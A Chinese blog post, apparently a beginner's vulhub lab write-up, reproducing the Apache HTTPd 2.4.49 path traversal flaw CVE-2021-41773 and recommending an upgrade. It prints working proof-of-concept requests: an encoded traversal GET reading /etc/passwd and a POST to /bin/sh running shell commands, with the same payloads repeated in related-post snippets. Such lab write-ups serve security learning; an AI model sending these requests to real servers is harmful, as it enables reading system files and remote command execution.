【vulhub系列】CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞复习

最新推荐文章于 2024-02-01 21:55:03 发布
最新推荐文章于 2024-02-01 21:55:03 发布
阅读量1k 收藏 1
点赞数
分类专栏: 记录一下vulhub靶场复现 文章标签: 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Wiofgb/article/details/127149519
版权

新人笔者日常求关注,新人上路,大佬多多指点。谢谢。

文章目录

  • 漏洞简介

  • 影响版本

  • 环境搭建
  • 漏洞复现
  • 修复建议

漏洞简介

​ Apache HTTPd 是Apache基金会开源的一款HTTP服务器。2021年10月8日Apache HTTPd官方发布安全更新,披露CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞。攻击者利用这个漏洞,可以读取到Apache服务器web目录以外的其他文件,或读取web中的脚本源码,如果服务器开启CGI或cgid服务,攻击者可进行任意代码执行。

影响版本

Apache HTTPd 2.4.49/2.4.50版本 且穿越的目录允许被访问。

环境搭建

  1. 进入目标目录:cd /root/桌面/vulhub-master/httpd/CVE-2021-41773/
  2. 打开dockers容器:
  3. docker-compose build
  4. docker-compose up -d
  5. 查看主机IP地址:ifconfig
  6. 查看容器开启的端口:docker ps
  7. 地址加端口查看服务:http://192.168.162.129:8080

 示例:

 

ip+端口进入靶场网页,网页里面有一个“It works!”。

示例:

 

漏洞复现

POC1:

GET /icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1

 示例:

 POC2

将数据包转换为post类型,在运用下列POC

POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1

echo; ls

 示例:

 

修复建议

 修复建议:升级到最新版的Apache HTTP Server 安全版本。

ps:来个大佬教教我打ctf吧,太难搞了。

一只学网安的小白。
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulhub-CVE-2021-41773
ce666666的博客
01-05 336
漏洞原理 Apache2.4.49版本中,引入路径体验,该漏洞仅影响具有“要求全部拒绝”访问权限的 Apache HTTP Server 2.4.49 版控制配置禁用。 漏洞危害 可利用漏洞进行远程RCE,访问web服务器上文档根目录之外的任意文件。泄露CGI。 影响版本 Apache HTTPd 2.4.49/2.4.50版本 环境搭建和测试 切换到vulhub/httpd/CVE-2021-41773,启动环境 docker-compose up -d 浏览器访问ip:8080 使用curl发送p
CVE-2021-41773Apache 文件读取&命令执行)复现
Biu_Biu_Bi的博客
01-03 235
Apache httpd Server 2.4.49 版本引入了一个具有路径穿越漏洞的新函数,但需要配合穿越的目录 配置 Require all granted,攻击者可利用该漏洞实现路径穿越从而读取任意文件,或者在配置了cgi的httpd程序中执行bash指令,从而有机会控制服务器。
Apache CVE-2021-41773漏洞复现
3tefanie丶zhou的博客
10-11 2372
漏洞简介 Apache HTTPd是Apache基金会开源的一款流行的HTTP服务器。2021年10月8日Apache HTTPd官方发布安全更新,披露了CVE-2021-42013 Apache HTTPd 2.4.49/2.4.50 路径穿越漏洞。由于对CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞的修复不完善,攻击者可构造恶意请求绕过补丁,利用穿越漏洞读取到Web目录之外的其他文件。同时若Apache HTTPd开启了cgi支持,攻击者可构造恶意请求执行命令,控制服
Apache HTTP Server漏洞CVE-2021-41773
weixin_44769042的博客
10-26 5629
漏洞复现记录--1 搭建环境 容器可以直接从DockerHub使用 dockerpullblueteamsteve/cve-2021-41773:no-cgid 使用: dockerrun-dit-p8080:80blueteamsteve/cve-2021-41773:no-cgid 访问:ip:8080
CVE-2021-41773目录遍历(文件穿越漏洞复现
qq_59826623的博客
10-11 1705
CVE-202141773目录遍历(文件穿越漏洞 Linux环境下 进入CVE-202141773漏洞环境文件夹,执行docker-compose up -d启动漏洞环境。 等待文件下载…… 安装完成后重启服务 访问本地的8080端口 打开Burpsuite,构造get参数 GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 转换为post参数 修改命令为POST /cgi-bin/.%2e/%2e
Apache——CVE-2021-41773
qq_45770644的博客
10-06 3695
前言: Apache Software 已迅速发布了针对 Apache HTTP Server 中的零日安全漏洞的修复程序,该漏洞于上周首次报告给该项目。该漏洞正在野外被积极利用,它表示,并可能允许攻击者访问敏感信息。 CVE-2021-41773可能允许路径遍历和随后的文件泄露。路径遍历问题允许未经授权的人访问 Web 服务器上的文件,方法是欺骗 Web 服务器或在其上运行的 Web 应用程序返回存在于 Web 根文件夹之外的文件。 该问题仅影响 Apache 开源 Web 服务器的 2.4.49.
CVE-2021-41773 Apache2.4.49&50 路径穿越漏洞复现
chen5225的博客
11-01 816
CVE-2021-41773 Apache2.4.49&50 路径穿越漏洞复现
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
laravel-CVE-2021-3129-EXP-main.zip 写shellexp
12-17
**Laravel 框架中的 CVE-2021-3129 漏洞详解及 EXP 利用** Laravel 是一个流行的开源 PHP Web 应用框架,以其优雅的语法和强大的功能深受开发者喜爱。然而,就像任何其他软件一样,Laravel 也存在安全漏洞。其中之...
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行.md
04-23
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行
CVE-2021-26295 Apache OFBiz 反序列化漏洞.md
04-13
CVE-2021-26295 Apache OFBiz 反序列化漏洞
apache-cve_2021_41773 复现
YouthBelief的博客
11-05 1710
apache-cve_2021_41773 复现apache-cve_2021_41773 复现0x01 漏洞描述0x02 影响范围0x03 漏洞复现手工复现0x04 漏洞修复 apache-cve_2021_41773 复现 Apache HTTP Server是一个开源、跨平台的Web服务器,它在全球范围内被广泛使用。 0x01 漏洞描述 2021年10月5日,Apache发布更新公告,修复了Apache HTTP Server2.4.49中的一个路径遍历和文件泄露漏洞CVE-2021-41773)。
Apache HTTP Server路径穿越漏洞复现(CVE-2021-41773)
小小猪的博客
10-26 3015
sudo docker pull blueteamsteve/cve-2021-41773:no-cgid sudo docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid
CVE-2021-41773(42013) Apache HTTP Server路径穿越漏洞复现
weixin_45260839的博客
06-03 5603
CVE-2021-41773(42013) Apache HTTP Server路径穿越漏洞复现
CVE-2021-41773 目录穿越复现并反弹shell
最新发布
m0_53073183的博客
02-01 1207
Apache HTTP Server 2.4.49 路径穿越漏洞CVE-2021-41773Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。
vulhub漏洞复现:还没好好开始整
weixin_49422491的博客
05-07 274
漏洞复现:Weblogic:CVE-2018-2894、nginx:CVE-2013-4547
apache代码执行(cve-2021-41773漏洞复现
weixin_42675091的博客
09-23 904
apache代码执行(cve-2021-41773漏洞复现
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8330
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
CVE-2021-41773
07-25
CVE-2021-41773Apache HTTPd 2.4.49中的一个路径穿越漏洞,它可能允许攻击者读取Apache服务器web目录以外的其他文件,或读取web中的脚本源码。如果服务器开启了CGI或cgid服务,攻击者还可以进行任意代码执行。\[2\...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值